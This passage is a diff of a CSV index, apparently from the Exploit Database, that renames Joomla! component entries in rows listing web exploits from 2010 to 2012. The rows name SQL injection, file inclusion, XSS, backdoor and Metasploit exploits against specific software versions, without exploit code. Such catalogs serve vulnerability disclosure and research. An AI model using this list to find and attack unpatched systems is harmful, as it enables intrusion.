Execution",2010-06-18,"Meder Kydyraliev",multiple,webapps,0 13922,platforms/php/webapps/13922.txt,"Joomla! Component 'com_joomdocs' - Cross-Site Scripting",2010-06-18,Sid3^effects,php,webapps,0 13923,platforms/php/webapps/13923.txt,"Joomla! Component 'com_answers' 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 -13925,platforms/php/webapps/13925.txt,"Joomla! Component 'com_oziogallery' 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 +13925,platforms/php/webapps/13925.txt,"Joomla! Component Ozio Gallery 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 13926,platforms/php/webapps/13926.txt,"Joomla! Component 'com_listbingo' 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 13927,platforms/php/webapps/13927.txt,"MarketSaz - Arbitrary File Upload",2010-06-18,NetQurd,php,webapps,0 13929,platforms/php/webapps/13929.txt,"Banner Management Script - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 @@ -23479,7 +23481,7 @@ id,file,description,date,author,platform,type,port 13978,platforms/php/webapps/13978.txt,"Job Search Engine Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 13979,platforms/php/webapps/13979.txt,"Joomla! Component 'com_ybggal' 1.0 - 'catid' Parameter SQL Injection",2010-06-22,v3n0m,php,webapps,0 13980,platforms/php/webapps/13980.txt,"Cornerstone CMS - SQL Injection",2010-06-22,"Th3 RDX",php,webapps,0 -13981,platforms/php/webapps/13981.txt,"Joomla! Component 'com_picasa2gallery' - Local File Inclusion",2010-06-22,kaMtiEz,php,webapps,0 +13981,platforms/php/webapps/13981.txt,"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion",2010-06-22,kaMtiEz,php,webapps,0 13982,platforms/php/webapps/13982.txt,"Alpin CMS - 'e4700.asp?id' SQL Injection",2010-06-22,CoBRa_21,php,webapps,0 13983,platforms/php/webapps/13983.txt,"Greeting card 1.1 - SQL Injection",2010-06-22,Net.Edit0r,php,webapps,0 13986,platforms/php/webapps/13986.txt,"Softbiz Resource Repository Script - Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 @@ -23492,7 +23494,7 @@ id,file,description,date,author,platform,type,port 14512,platforms/php/webapps/14512.txt,"Concept E-Commerce - SQL Injection",2010-07-31,gendenk,php,webapps,0 13995,platforms/asp/webapps/13995.txt,"Boat Classifieds - 'printdetail.asp?Id' SQL Injection",2010-06-23,CoBRa_21,asp,webapps,0 13996,platforms/php/webapps/13996.txt,"Pre Multiple Vendors Shopping Malls - 'products.php?sid' SQL Injection",2010-06-23,CoBRa_21,php,webapps,0 -13997,platforms/php/webapps/13997.txt,"Joomla! Component 'jeeventcalendar' - SQL Injection",2010-06-23,"L0rd CrusAd3r",php,webapps,0 +13997,platforms/php/webapps/13997.txt,"Joomla! Component JE Ajax Event Calendar 1.0.5 - SQL Injection",2010-06-23,"L0rd CrusAd3r",php,webapps,0 13999,platforms/php/webapps/13999.html,"Software Index - Arbitrary File Upload",2010-06-23,indoushka,php,webapps,0 14000,platforms/php/webapps/14000.txt,"PishBini Footbal - Cross-Site Scripting / SQL Injection",2010-06-23,indoushka,php,webapps,0 14001,platforms/multiple/webapps/14001.txt,"Interscan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",multiple,webapps,0 @@ -23504,7 +23506,7 @@ id,file,description,date,author,platform,type,port 14011,platforms/php/webapps/14011.txt,"OpenEMR Electronic Medical Record Software 3.2 - Multiple Vulnerabilities",2010-06-24,"David Shaw",php,webapps,0 14015,platforms/php/webapps/14015.txt,"2DayBiz Photo Sharing Script - SQL Injection (1)",2010-06-24,JaMbA,php,webapps,0 14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta - 'init.php' Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0 -14017,platforms/php/webapps/14017.txt,"Joomla! Component 'com_realtyna' - Local File Inclusion",2010-06-24,MISTERFRIBO,php,webapps,0 +14017,platforms/php/webapps/14017.txt,"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion",2010-06-24,MISTERFRIBO,php,webapps,0 14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community Portal - 'user-profile.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0 14019,platforms/php/webapps/14019.txt,"2DayBiz Real Estate Portal - 'viewpropertydetails.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0 14020,platforms/php/webapps/14020.txt,"2DayBiz The Web Template Software - SQL Injection / Cross-Site Scripting",2010-06-24,Sangteamtham,php,webapps,0 @@ -23520,8 +23522,8 @@ id,file,description,date,author,platform,type,port 14050,platforms/php/webapps/14050.txt,"ARSC Really Simple Chat 3.3 - Remote File Inclusion / Cross-Site Scripting",2010-06-25,"Zer0 Thunder",php,webapps,0 14051,platforms/php/webapps/14051.txt,"2DayBiz B2B Portal Script - 'selling_buy_leads1.php' SQL Injection",2010-06-25,r45c4l,php,webapps,0 14053,platforms/php/webapps/14053.txt,"snipe Gallery Script - SQL Injection",2010-06-25,"dev!l ghost",php,webapps,0 -14054,platforms/php/webapps/14054.txt,"Joomla! Component 'jesubmit' - SQL Injection",2010-06-25,"L0rd CrusAd3r",php,webapps,0 -14055,platforms/php/webapps/14055.txt,"Joomla! Component 'com_sef' - Remote File Inclusion",2010-06-26,Li0n-PaL,php,webapps,0 +14054,platforms/php/webapps/14054.txt,"Joomla! Component jesubmit 1.4 - SQL Injection",2010-06-25,"L0rd CrusAd3r",php,webapps,0 +14055,platforms/php/webapps/14055.txt,"Joomla! Component com_sef - Remote File Inclusion",2010-06-26,Li0n-PaL,php,webapps,0 14056,platforms/php/webapps/14056.txt,"Clicker CMS - Blind SQL Injection",2010-06-26,hacker@sr.gov.yu,php,webapps,0 14057,platforms/php/webapps/14057.txt,"WordPress Plugin Cimy Counter - Exploit",2010-06-26,sebug,php,webapps,0 14058,platforms/aix/webapps/14058.html,"PHP-Nuke 8.2 - Arbitrary File Upload Exploit",2010-06-26,Net.Edit0r,aix,webapps,0 @@ -23531,7 +23533,7 @@ id,file,description,date,author,platform,type,port 14086,platforms/php/webapps/14086.txt,"PTCPay GEN4 - 'buyupg.php' SQL Injection",2010-06-28,Dark.Man,php,webapps,0 14062,platforms/php/webapps/14062.txt,"Joomla! Component 'jeeventcalendar' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0 14063,platforms/php/webapps/14063.txt,"Joomla! Component 'com_jejob' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0 -14064,platforms/php/webapps/14064.txt,"Joomla! Component 'jesectionfinder' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0 +14064,platforms/php/webapps/14064.txt,"Joomla! Component jesectionfinder - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0 14073,platforms/php/webapps/14073.txt,"2DayBiz Matrimonial Script - smartresult.php SQL Injection",2010-06-27,"Easy Laster",php,webapps,0 14070,platforms/php/webapps/14070.txt,"Speedy 1.0 - Arbitrary File Upload",2010-06-26,"ViRuS Qalaa",php,webapps,0 14074,platforms/php/webapps/14074.rb,"2DayBiz ybiz Polls Script - SQL Injection",2010-06-27,"Easy Laster",php,webapps,0 @@ -23562,7 +23564,7 @@ id,file,description,date,author,platform,type,port 14124,platforms/php/webapps/14124.pl,"PHP-Nuke 8.0 - SQL Injection",2010-06-30,Dante90,php,webapps,0 14125,platforms/php/webapps/14125.pl,"ShopCartDx 4.30 - 'products.php' Blind SQL Injection",2010-06-30,Dante90,php,webapps,0 14126,platforms/php/webapps/14126.txt,"Joomla! Component Gamesbox 1.0.2 - 'id' Parameter SQL Injection",2010-06-30,v3n0m,php,webapps,0 -14127,platforms/php/webapps/14127.txt,"Joomla! Component 'Joomanager' - SQL Injection",2010-06-30,Sid3^effects,php,webapps,0 +14127,platforms/php/webapps/14127.txt,"Joomla! Component Joomanager - SQL Injection",2010-06-30,Sid3^effects,php,webapps,0 14141,platforms/php/webapps/14141.pl,"Oxygen2PHP 1.1.3 - 'member.php' SQL Injection",2010-06-30,Dante90,php,webapps,0 14132,platforms/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",php,webapps,0 14144,platforms/php/webapps/14144.txt,"Specialist Bed and Breakfast Website - SQL Injection",2010-06-30,JaMbA,php,webapps,0 @@ -23596,7 +23598,7 @@ id,file,description,date,author,platform,type,port 14188,platforms/php/webapps/14188.html,"Cpanel 11.25 - Cross-Site Request Forgery (Add FTP Account)",2010-07-03,G0D-F4Th3r,php,webapps,0 14193,platforms/php/webapps/14193.c,"iscripts Socialware 2.2.x - Multiple Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps,0 14208,platforms/php/webapps/14208.txt,"Sandbox 2.0.2 - Local File Inclusion",2010-07-04,saudi0hacker,php,webapps,0 -14196,platforms/php/webapps/14196.txt,"Joomla! Component 'com_socialads' - Persistent Cross-Site Scripting",2010-07-03,Sid3^effects,php,webapps,0 +14196,platforms/php/webapps/14196.txt,"Joomla! Component Techjoomla SocialAds - Persistent Cross-Site Scripting",2010-07-03,Sid3^effects,php,webapps,0 14197,platforms/php/webapps/14197.txt,"iScripts MultiCart 2.2 - Multiple SQL Injections",2010-07-03,"Salvatore Fresta",php,webapps,0 14198,platforms/php/webapps/14198.txt,"WordPress Plugin Simple:Press 4.3.0 - SQL Injection",2010-07-04,"ADEO Security",php,webapps,0 14199,platforms/php/webapps/14199.txt,"PHPaaCMS 0.3.1 - (show.php?id=) SQL Injection",2010-07-04,Shafiq-Ur-Rehman,php,webapps,0 @@ -23656,8 +23658,8 @@ id,file,description,date,author,platform,type,port 14293,platforms/php/webapps/14293.txt,"Joomla! Component 'Minify4Joomla' - Arbitrary File Upload / Persistent Cross-Site Scripting",2010-07-09,Sid3^effects,php,webapps,0 14291,platforms/php/webapps/14291.txt,"Joomla! Component 'IXXO Cart' - SQL Injection",2010-07-09,Sid3^effects,php,webapps,0 14434,platforms/php/webapps/14434.txt,"Joomla! Component 'com_jomtube' - 'user_id' Parameter Blind SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0 -14312,platforms/php/webapps/14312.txt,"Joomla! Component 'com_redshop' 1.0 - 'pid' Parameter SQL Injection",2010-07-10,v3n0m,php,webapps,0 -14296,platforms/php/webapps/14296.txt,"Joomla! Component 'com_quickfaq' - Blind SQL Injection",2010-07-09,RoAd_KiLlEr,php,webapps,0 +14312,platforms/php/webapps/14312.txt,"Joomla! Component redSHOP 1.0 - 'pid' Parameter SQL Injection",2010-07-10,v3n0m,php,webapps,0 +14296,platforms/php/webapps/14296.txt,"Joomla! Component QuickFAQ 1.0.3 - Blind SQL Injection",2010-07-09,RoAd_KiLlEr,php,webapps,0 14316,platforms/php/webapps/14316.pl,"PHP-Nuke 8.0 -Web_Links Module - Blind SQL Injection",2010-07-10,yawn,php,webapps,0 14299,platforms/php/webapps/14299.txt,"CMS Contentia - 'news.php' SQL Injection",2010-07-09,GlaDiaT0R,php,webapps,0 14306,platforms/php/webapps/14306.txt,"HoloCMS 9.0.47 - 'news.php' SQL Injection",2010-07-09,GlaDiaT0R,php,webapps,0 @@ -23691,7 +23693,7 @@ id,file,description,date,author,platform,type,port 14362,platforms/php/webapps/14362.txt,"CMSQLite - SQL Injection",2010-07-14,"High-Tech Bridge SA",php,webapps,0 14365,platforms/php/webapps/14365.txt,"Campsite CMS - Remote Persistent Cross-Site Scripting",2010-07-15,D4rk357,php,webapps,0 14366,platforms/php/webapps/14366.txt,"Whizzy CMS 10.01 - Local File Inclusion",2010-07-15,"Anarchy Angel",php,webapps,0 -14368,platforms/php/webapps/14368.txt,"Joomla! Component 'com_redshop' 1.0.23.1 - Blind SQL Injection",2010-07-15,"Salvatore Fresta",php,webapps,0 +14368,platforms/php/webapps/14368.txt,"Joomla! Component redSHOP 1.0.23.1 - Blind SQL Injection",2010-07-15,"Salvatore Fresta",php,webapps,0 14369,platforms/jsp/webapps/14369.txt,"ORACLE Business Process Management (Process Administrator) 5.7-6.0-10.3 - Cross-Site Scripting",2010-07-15,Markot,jsp,webapps,0 14370,platforms/php/webapps/14370.txt,"BS Scripts Directory - 'info.php' SQL Injection",2010-07-15,D4rk357,php,webapps,0 14371,platforms/php/webapps/14371.txt,"BS Scripts Directory - 'articlesdetails.php' SQL Injection",2010-07-16,k4k4shi,php,webapps,0 @@ -23711,7 +23713,7 @@ id,file,description,date,author,platform,type,port 14392,platforms/php/webapps/14392.txt,"Kayako eSupport 3.70.02 - SQL Injection",2010-07-17,Sid3^effects,php,webapps,0 14393,platforms/php/webapps/14393.txt,"Calendarix - 'cal_cat.php' SQL Injection",2010-07-17,SixP4ck3r,php,webapps,0 14394,platforms/php/webapps/14394.txt,"Joomla! Component 'com_spa' - SQL Injection (2)",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0 -14395,platforms/php/webapps/14395.txt,"Joomla! Component 'com_staticxt' - SQL Injection",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0 +14395,platforms/php/webapps/14395.txt,"Joomla! Component StaticXT - SQL Injection",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0 14404,platforms/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - 'functions.php' SQL Injection",2010-07-18,ScOrPiOn,php,webapps,0 14405,platforms/php/webapps/14405.txt,"PHP-Fusion - Remote Command Execution",2010-07-18,"ViRuS Qalaa",php,webapps,0 14401,platforms/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,asp,webapps,0 @@ -23746,11 +23748,11 @@ id,file,description,date,author,platform,type,port 14458,platforms/php/webapps/14458.txt,"sNews - 'index.php' SQL Injection",2010-07-24,MajoR,php,webapps,0 14459,platforms/php/webapps/14459.txt,"Open Realty 2.x / 3.x - Persistent Cross-Site Scripting",2010-07-24,K053,php,webapps,0 14461,platforms/asp/webapps/14461.txt,"AKY Blog - SQL Injection",2010-07-24,v0calist,asp,webapps,0 -14462,platforms/php/webapps/14462.txt,"Joomla! Component 'com_oziogallery' - SQL Injection",2010-07-24,"ViRuS Qalaa",php,webapps,0 +14462,platforms/php/webapps/14462.txt,"Joomla! Component Ozio Gallery - SQL Injection",2010-07-24,"ViRuS Qalaa",php,webapps,0 14463,platforms/php/webapps/14463.txt,"Joomla! Component 'com_itarmory' - SQL Injection",2010-07-24,Craw,php,webapps,0 14465,platforms/php/webapps/14465.txt,"sNews 1.7 - (index.php?category) SQL Injection",2010-07-24,CoBRa_21,php,webapps,0 14466,platforms/php/webapps/14466.txt,"Joomla! Component Joomdle 0.24 - SQL Injection",2010-07-24,kaMtiEz,php,webapps,0 -14467,platforms/php/webapps/14467.txt,"Joomla! Component 'com_youtube' - SQL Injection",2010-07-24,Forza-Dz,php,webapps,0 +14467,platforms/php/webapps/14467.txt,"Joomla! Component YouTube 1.5 - SQL Injection",2010-07-24,Forza-Dz,php,webapps,0 14469,platforms/php/webapps/14469.txt,"XAOS CMS - SQL Injection",2010-07-25,H-SK33PY,php,webapps,0 14470,platforms/php/webapps/14470.txt,"Ballettin Forum - SQL Injection",2010-07-25,3v0,php,webapps,0 14471,platforms/php/webapps/14471.txt,"CMS Ignition - SQL Injection",2010-07-25,neavorc,php,webapps,0 @@ -23758,7 +23760,7 @@ id,file,description,date,author,platform,type,port 14483,platforms/php/webapps/14483.pl,"PunBB 1.3.4 / Pun_PM 1.2.6 - Blind SQL Injection",2010-07-27,Dante90,php,webapps,0 14474,platforms/php/webapps/14474.txt,"Freeway CMS 1.4.3.210 - SQL Injection",2010-07-26,**RoAd_KiLlEr**,php,webapps,0 14476,platforms/php/webapps/14476.txt,"Joomla! Component Visites 1.1 RC2 - Remote File Inclusion",2010-07-26,Li0n-PaL,php,webapps,0 -14481,platforms/php/webapps/14481.txt,"Joomla! Component 'com_ttvideo' 1.0 - SQL Injection",2010-07-27,"Salvatore Fresta",php,webapps,0 +14481,platforms/php/webapps/14481.txt,"Joomla! Component TTVideo 1.0 - SQL Injection",2010-07-27,"Salvatore Fresta",php,webapps,0 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0 14488,platforms/php/webapps/14488.txt,"Joomla! Component 'com_appointinator' 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0 14490,platforms/php/webapps/14490.txt,"nuBuilder - Remote File Inclusion",2010-07-28,Ahlspiess,php,webapps,0 @@ -23790,7 +23792,7 @@ id,file,description,date,author,platform,type,port 14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script 1.0.9 - SQL Injection",2010-08-07,Silic0n,php,webapps,0 14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - Statistics.php SQL Injection",2010-08-08,garwga,php,webapps,0 14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 - Database Disclosure",2010-08-09,indoushka,php,webapps,0 -14598,platforms/php/webapps/14598.txt,"Joomla! Component 'com_teams' - Multiple Blind SQL Injection",2010-08-10,"Salvatore Fresta",php,webapps,0 +14598,platforms/php/webapps/14598.txt,"Joomla! Component Teams - Multiple Blind SQL Injection",2010-08-10,"Salvatore Fresta",php,webapps,0 14589,platforms/php/webapps/14589.txt,"PHP-Nuke 8.x.x - Blind SQL Injection",2010-08-09,ITSecTeam,php,webapps,0 14592,platforms/php/webapps/14592.txt,"Joomla! Component 'com_yellowpages' - SQL Injection",2010-08-09,"al bayraqim",php,webapps,0 14595,platforms/php/webapps/14595.html,"wizmall 6.4 - Cross-Site Request Forgery",2010-08-09,pyw1414,php,webapps,0 @@ -23860,7 +23862,7 @@ id,file,description,date,author,platform,type,port 14838,platforms/php/webapps/14838.txt,"Seagull 0.6.7 - SQL Injection",2010-08-29,Sweet,php,webapps,0 14839,platforms/php/webapps/14839.txt,"GuestBookPlus - HTML Injection / Bypass Comments Limit",2010-08-29,"MiND C0re",php,webapps,0 14841,platforms/php/webapps/14841.txt,"seagull 0.6.7 - Remote File Inclusion",2010-08-30,"FoX HaCkEr",php,webapps,0 -14845,platforms/php/webapps/14845.txt,"Joomla! Component 'com_picsell' - Local File Disclosure",2010-08-30,Craw,php,webapps,0 +14845,platforms/php/webapps/14845.txt,"Joomla! Component PicSell 1.0 - Local File Disclosure",2010-08-30,Craw,php,webapps,0 14846,platforms/php/webapps/14846.txt,"Joomla! Component JE FAQ Pro 1.5.0 - Multiple Blind SQL Injection",2010-08-31,"Chip d3 bi0s",php,webapps,0 14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 - (viewpost.php) SQL Injection",2010-08-31,"Ptrace Security",php,webapps,0 14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass",2010-09-01,Abysssec,php,webapps,0 @@ -23930,7 +23932,7 @@ id,file,description,date,author,platform,type,port 15029,platforms/php/webapps/15029.txt,"phpMyFamily - Multiple Vulnerabilities",2010-09-17,Abysssec,php,webapps,0 15037,platforms/php/webapps/15037.html,"CMSimple - Cross-Site Request Forgery",2010-09-18,Abysssec,php,webapps,0 15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 < 2010 - 'reviews.php' Error-Based SQL Injection",2010-09-18,secret,php,webapps,0 -15040,platforms/php/webapps/15040.txt,"Joomla! Component 'com_restaurantguide' - Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0 +15040,platforms/php/webapps/15040.txt,"Joomla! Component Restaurant Guide 1.0.0 - Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0 15041,platforms/php/webapps/15041.py,"Maian Gallery 2 - Local File Download",2010-09-18,mr_me,php,webapps,0 15044,platforms/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0 15046,platforms/php/webapps/15046.txt,"Fashione E-Commerce Webshop - Multiple SQL Injections",2010-09-19,secret,php,webapps,0 @@ -23946,7 +23948,7 @@ id,file,description,date,author,platform,type,port 15078,platforms/asp/webapps/15078.txt,"gausCMS - Multiple Vulnerabilities",2010-09-22,Abysssec,asp,webapps,0 15080,platforms/php/webapps/15080.txt,"Skybluecanvas 1.1-r248 - Cross-Site Request Forgery",2010-09-22,Sweet,php,webapps,0 15082,platforms/php/webapps/15082.txt,"BSI Hotel Booking System Admin 1.4/2.0 - Login Bypass",2010-09-22,K-159,php,webapps,0 -15084,platforms/php/webapps/15084.txt,"Joomla! Component 'com_timetrack' 1.2.4 - Multiple SQL Injection",2010-09-22,"Salvatore Fresta",php,webapps,0 +15084,platforms/php/webapps/15084.txt,"Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injection",2010-09-22,"Salvatore Fresta",php,webapps,0 15085,platforms/php/webapps/15085.txt,"Joomla! Component Joostina - SQL Injection",2010-09-22,Gamoscu,php,webapps,0 15090,platforms/php/webapps/15090.txt,"WAnewsletter 2.1.2 - SQL Injection",2010-09-23,BrOx-Dz,php,webapps,0 15091,platforms/php/webapps/15091.txt,"GeekLog 1.3.8 (filemgmt) - SQL Injection",2010-09-23,Gamoscu,php,webapps,0 @@ -24080,7 +24082,7 @@ id,file,description,date,author,platform,type,port 15360,platforms/php/webapps/15360.pl,"MetInfo 2.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0 15361,platforms/php/webapps/15361.pl,"MetInfo 3.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0 15366,platforms/php/webapps/15366.txt,"Joomla! Component Pulse Infotech Flip Wall - SQL Injection",2010-10-31,FL0RiX,php,webapps,0 -15367,platforms/php/webapps/15367.txt,"Joomla! Component 'com_sponsorwall' - SQL Injection",2010-10-31,FL0RiX,php,webapps,0 +15367,platforms/php/webapps/15367.txt,"Joomla! Component Sponsor Wall 1.1 - SQL Injection",2010-10-31,FL0RiX,php,webapps,0 15369,platforms/php/webapps/15369.php,"Auto CMS 1.8 - Remote Code Execution",2010-10-31,"Giuseppe D'Inverno",php,webapps,0 15370,platforms/php/webapps/15370.txt,"XAMPP 1.7.3 - Multiple Vulnerabilities",2010-11-01,TheLeader,php,webapps,0 15381,platforms/php/webapps/15381.txt,"Collabtive - SQL Injection",2010-11-01,"Anatolia Security",php,webapps,0 @@ -24120,7 +24122,7 @@ id,file,description,date,author,platform,type,port 15456,platforms/php/webapps/15456.txt,"Joomla! Component 'com_clanlist' - SQL Injection",2010-11-08,CoBRa_21,php,webapps,0 15496,platforms/php/webapps/15496.txt,"Metinfo 3.0 - Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,php,webapps,0 15459,platforms/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,php,webapps,0 -15460,platforms/php/webapps/15460.txt,"Joomla! Component 'com_pro_desk' 1.5 - Local File Inclusion",2010-11-08,d3v1l,php,webapps,0 +15460,platforms/php/webapps/15460.txt,"Joomla! Component ProDesk 1.5 - Local File Inclusion",2010-11-08,d3v1l,php,webapps,0 15466,platforms/php/webapps/15466.txt,"Joomla! Component JQuarks4s 1.0.0 - Blind SQL Injection",2010-11-09,"Salvatore Fresta",php,webapps,0 15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL Injection",2010-11-09,"Easy Laster",php,webapps,0 15468,platforms/php/webapps/15468.txt,"Joomla! Component 'btg_oglas' - HTML / Cross-Site Scripting Injection",2010-11-09,CoBRa_21,php,webapps,0 @@ -24749,7 +24751,7 @@ id,file,description,date,author,platform,type,port 17452,platforms/php/webapps/17452.txt,"Joomla! Component 'JoomlaXi' - Persistent Cross-Site Scripting",2011-06-26,"Karthik R",php,webapps,0 17453,platforms/php/webapps/17453.txt,"WordPress Plugin Beer Recipes 1.0 - Cross-Site Scripting",2011-06-26,TheUzuki.',php,webapps,0 17457,platforms/php/webapps/17457.txt,"rgboard 4.2.1 - SQL Injection",2011-06-28,hamt0ry,php,webapps,0 -17464,platforms/php/webapps/17464.txt,"Joomla! Component 'mdigg' - SQL Injection",2011-07-01,"Caddy Dz",php,webapps,0 +17464,platforms/php/webapps/17464.txt,"Joomla! Component mDigg 2.2.8 - SQL Injection",2011-07-01,"Caddy Dz",php,webapps,0 17465,platforms/php/webapps/17465.txt,"WordPress 3.1.3 - SQL Injection",2011-07-01,"SEC Consult",php,webapps,0 17466,platforms/php/webapps/17466.txt,"Ollance Member Login Script - Multiple Vulnerabilities",2011-07-01,"$#4d0\/\/[r007k17]",php,webapps,0 17472,platforms/asp/webapps/17472.txt,"DmxReady Catalog Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,asp,webapps,0 @@ -24849,7 +24851,7 @@ id,file,description,date,author,platform,type,port 17687,platforms/php/webapps/17687.txt,"WordPress Plugin Global Content Blocks 1.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 17688,platforms/php/webapps/17688.txt,"WordPress Plugin Allow PHP in Posts and Pages 2.0.0.RC1 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 17689,platforms/php/webapps/17689.txt,"WordPress Plugin Menu Creator 1.1.7 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 -17695,platforms/php/webapps/17695.txt,"phpMyRealty 1.0.7 - SQL Injection",2011-08-19,H4T$A,php,webapps,0 +17695,platforms/php/webapps/17695.txt,"PHPMyRealty 1.0.7 - SQL Injection",2011-08-19,H4T$A,php,webapps,0 17694,platforms/php/webapps/17694.txt,"network tracker .95 - Persistent Cross-Site Scripting",2011-08-19,G13,php,webapps,0 17698,platforms/php/webapps/17698.rb,"Oracle Secure Backup - Authentication Bypass/Command Injection (Metasploit)",2011-08-19,Metasploit,php,webapps,0 17702,platforms/php/webapps/17702.rb,"WordPress Plugin Block-Spam-By-Math-Reloaded - Bypass Exploit",2011-08-20,"Tiago Ferreira and Heyder Andrade",php,webapps,0 @@ -24981,7 +24983,7 @@ id,file,description,date,author,platform,type,port 17938,platforms/php/webapps/17938.txt,"EFront 3.6.9 Community Edition - Multiple Vulnerabilities",2011-10-07,IHTeam,php,webapps,0 17941,platforms/linux/webapps/17941.rb,"Spreecommerce 0.60.1 - Arbitrary Command Execution (Metasploit)",2011-10-07,Metasploit,linux,webapps,0 17943,platforms/php/webapps/17943.txt,"BOOKSolved 1.2.2 - Remote File Disclosure",2011-10-08,bd0rk,php,webapps,0 -17944,platforms/php/webapps/17944.txt,"Joomla! Component 'com_timereturns' 2.0 - SQL Injection",2011-10-08,kaMtiEz,php,webapps,0 +17944,platforms/php/webapps/17944.txt,"Joomla! Component Time Returns 2.0 - SQL Injection",2011-10-08,kaMtiEz,php,webapps,0 17946,platforms/php/webapps/17946.txt,"NexusPHP 1.5 - SQL Injection",2011-10-08,flyh4t,php,webapps,0 17947,platforms/php/webapps/17947.rb,"Snortreport - nmap.php and nbtscan.php Remote Command Execution (Metasploit)",2011-10-09,Metasploit,php,webapps,0 17949,platforms/php/webapps/17949.rb,"MyBB 1.6.4 - Backdoor (Metasploit)",2011-10-09,Metasploit,php,webapps,0 @@ -25022,7 +25024,7 @@ id,file,description,date,author,platform,type,port 18020,platforms/php/webapps/18020.txt,"Jara 1.6 - SQL Injection",2011-10-23,muuratsalo,php,webapps,0 18021,platforms/php/webapps/18021.php,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (1)",2011-10-23,EgiX,php,webapps,0 18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - Cross-Site Request Forgery (Add Admin)",2011-10-23,"EjRaM HaCkEr",php,webapps,0 -18042,platforms/php/webapps/18042.txt,"Joomla! Component 'com_techfolio' 1.0 - SQL Injection",2011-10-28,"Chris Russell",php,webapps,0 +18042,platforms/php/webapps/18042.txt,"Joomla! Component Techfolio 1.0 - SQL Injection",2011-10-28,"Chris Russell",php,webapps,0 18046,platforms/php/webapps/18046.txt,"Joomla! Component Barter Sites 1.3 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18031,platforms/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (Metasploit) (2)",2011-10-25,Metasploit,php,webapps,0 18032,platforms/windows/webapps/18032.rb,"SAP Management Console - OSExecute Payload Execution (Metasploit)",2011-10-24,Metasploit,windows,webapps,0 @@ -25032,7 +25034,7 @@ id,file,description,date,author,platform,type,port 18039,platforms/php/webapps/18039.txt,"WordPress Plugin wptouch - SQL Injection",2011-10-27,longrifle0x,php,webapps,0 18045,platforms/php/webapps/18045.txt,"PHP Photo Album 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0 18047,platforms/php/webapps/18047.txt,"Joomla! Component 'com_jeemasms' 3.2 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 -18048,platforms/php/webapps/18048.txt,"Joomla! Component 'com_vikrealestate' 1.0 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 +18048,platforms/php/webapps/18048.txt,"Joomla! Component Vik Real Estate 1.0 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18050,platforms/php/webapps/18050.txt,"Joomla! Component HM Community - Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0 18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress 3.1.4 - Persistent Cross-Site Scripting",2011-10-31,"Paul Loftness",php,webapps,0 18055,platforms/php/webapps/18055.txt,"WordPress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps,0 @@ -25223,7 +25225,7 @@ id,file,description,date,author,platform,type,port 18504,platforms/hardware/webapps/18504.txt,"Sagem F@ST 2604 (ADSL Router) - Cross-Site Request Forgery",2012-02-22,"KinG Of PiraTeS",hardware,webapps,0 